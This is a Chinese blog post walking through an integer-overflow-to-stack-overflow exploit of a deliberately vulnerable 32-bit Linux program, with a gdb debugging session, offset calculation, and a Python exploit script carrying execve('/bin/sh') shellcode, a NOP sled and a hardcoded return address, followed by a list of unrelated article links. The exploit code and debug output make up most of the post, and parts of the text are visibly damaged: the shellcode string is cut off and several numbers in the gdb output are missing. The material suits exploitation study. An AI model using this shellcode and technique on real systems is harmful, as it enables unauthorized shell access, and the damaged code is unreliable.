Linux Exploit系列之二 整数溢出
2024-08-30 23:46:48
整数溢出
虚拟机安装:Ubuntu 12.04(x86)
什么是整数溢出?
存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行,但整数溢出可能会导致堆栈溢出或堆溢出,这可能导致任意代码执行。在这篇文章中,我将仅谈论整数溢出导致堆栈溢出,整数溢出导致堆溢出将在后面的单独的帖子中讨论。
后边的内容复制粘贴好烦,还是说关键点吧!
原文见:https://bbs.pediy.com/thread-216869.htm
这个文章解释的比上一个清楚多了,相信能看懂,唯一不懂的,和上一篇估计一样,还是地址计算的问题
同样是使用gdb 调试:gdb -q vuln
下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统,gcc 4.8.2)
首先使用disassemble 查看汇编代码,看看程序的汇编代码布局:
(gdb) disassemble validate_passwd
Dump of assembler code for function validate_passwd:
0x08048507 <+>: push %ebp
0x08048508 <+>: mov %esp,%ebp
0x0804850a <+>: sub $0x28,%esp
0x0804850d <+>: mov 0x8(%ebp),%eax
0x08048510 <+>: mov %eax,(%esp)
0x08048513 <+>: call 0x80483e0 <strlen@plt>
0x08048518 <+>: mov %al,-0x9(%ebp)
0x0804851b <+>: cmpb $0x3,-0x9(%ebp)
0x0804851f <+>: jbe 0x8048554 <validate_passwd+>
0x08048521 <+>: cmpb $0x8,-0x9(%ebp)
0x08048525 <+>: ja 0x8048554 <validate_passwd+>
0x08048527 <+>: movl $0x8048670,(%esp)
0x0804852e <+>: call 0x80483b0 <puts@plt>
0x08048533 <+>: mov 0x804a040,%eax
0x08048538 <+>: mov %eax,(%esp)
0x0804853b <+>: call 0x8048390 <fflush@plt>
0x08048540 <+>: mov 0x8(%ebp),%eax
0x08048543 <+>: mov %eax,0x4(%esp)
0x08048547 <+>: lea -0x14(%ebp),%eax
0x0804854a <+>: mov %eax,(%esp)
0x0804854d <+>: call 0x80483a0 <strcpy@plt>
嗯,发现编译器改动不大,就是将strlen函数直接内嵌了,没有使用函数调用(库函数的惯用做法),不多解释
(gdb) list 看一眼源码,方便下断点
(gdb) b validate_passwd 下断
然后开心的按照作者说的运行
下边是调试步骤
Reading symbols from vuln...done.
(gdb) b validate_passwd
Breakpoint at 0x804850d: file vuln.c, line .
(gdb) r sploitfun `python -c 'print "A"*261'`
Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'` Breakpoint , validate_passwd (
passwd=0xbffff6b6 'A' <repeats times>...) at vuln.c:
unsigned char passwd_len = strlen(passwd); /* [1] */
(gdb) n //单步调试,想看看执行到了我们认为的关键的代码没有,很明显这儿还不是关键代码
if(passwd_len >= && passwd_len <= ) { /* [2] */
(gdb) n
printf("Valid Password\n"); /* [3] */
(gdb) p passwd_len //这儿是关键处了,但是如果是正确的话,passwd_len 应该是'A',很可能是程序还没真正执行到
$ = '\005'
(gdb) n
Valid Password
fflush(stdout);
(gdb) n
strcpy(passwd_buf,passwd); /* [4] */
(gdb) n
store_passwd_indb(passwd_buf); /* [6] */
(gdb) p passwd_len //好终于到了我们想要的地方了
$ = 'A'
(gdb) p &passwd_len //passwd_len的地址,既然利用的是栈,我们在乎的是内存布局
$ = (unsigned char *) 0xbffff46f 'A' <repeats times>...
(gdb) p buf //手误,没有任何原因
$ = 0x0
(gdb) n
}
(gdb) p passwd_buf //passwd_buf的值也对了
$ = 'A' <repeats times>
(gdb) p &passwd_buf[] //passwd_buf的地址也和我们想象的一样
$ = 0xbffff464 'A' <repeats times>...
(gdb) p/x $eip //很明显还没有被覆盖
$ = 0x8048578
(gdb) p/x $ebp //这个真的不是在凑字数,ebp的地址很重要
$ = 0xbffff478
(gdb) n
0x41414141 in ?? ()
(gdb) p/x $eip //好,已经覆盖了
$ = 0x41414141
(gdb) p/x $ebp
$ = 0x41414141
(gdb)
按照我上边的注释,相信大家对调试过程已经有了一定了解,现在说下地址的计算
$ebp - &passwd_buf[0] +4 = 0x18 = $eip - &passwd_buf[0]
这就是所谓的内存偏移,有了这个,我们的ret_addr就可以算出来了
ret_addr= 0xbffff464 +0x18 + 100
还是老规矩,附上我的exp.python 代码
#exp.py
#!/usr/bin/env python
import struct
from subprocess import call arg1 = "sploitfun" #Stack address where shellcode is copied.
ret_addr = 0xbffff4e0 #Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$ #endianess convertion
def conv(num):
return struct.pack("<I",num)#unk + RA + NOP's + Shellcode
arg2 = "A" * 24
arg2 += conv(ret_addr);
arg2 += "\x90" * 100
arg2 += scode
arg2 += "C" * 108 print "Calling vulnerable program"
call(["./vuln", arg1, arg2])
最新文章
- ubuntu kylin 14.04安装配置MongoDB v2.6.1(转)
- ajax的使用:(ajaxReturn[ajax的返回方法]),(eval返回字符串);分页;第三方类(page.class.php)如何载入;自动加载函数库(functions);session如何防止跳过登录访问(构造函数说明)
- IOS第三天
- 2015年第3本(英文第2本):Daughter of Deceit
- codeforces 710E E. Generate a String(dp)
- 《python核心编程》读书笔记--第15章 正则表达式
- get/close not same thread Druid 连接池一个设置
- java卡与native卡的区别
- [Guava学习笔记]Strings: 字符串处理
- Oracle中Left join的on和where的效率差别
- Windows下载安装jmeter
- Vue.js 学习笔记 第5章 内置指令
- oracle wallet使用与维护
- 初学node.js,安装nodemon,学习debug模式,安装cpu-stat
- 大部分教程不会告诉你的 12 个 JS 技巧
- IO文件流
- [转]Spring Boot修改最大上传文件限制:The field file exceeds its maximum permitted size of 1048576 bytes.
- ansible hosts文件编写,简单使用测试(普通用户、sudo用户、root用户登录权限测试)
- Python __all__系统变量
- golang 打印变量类型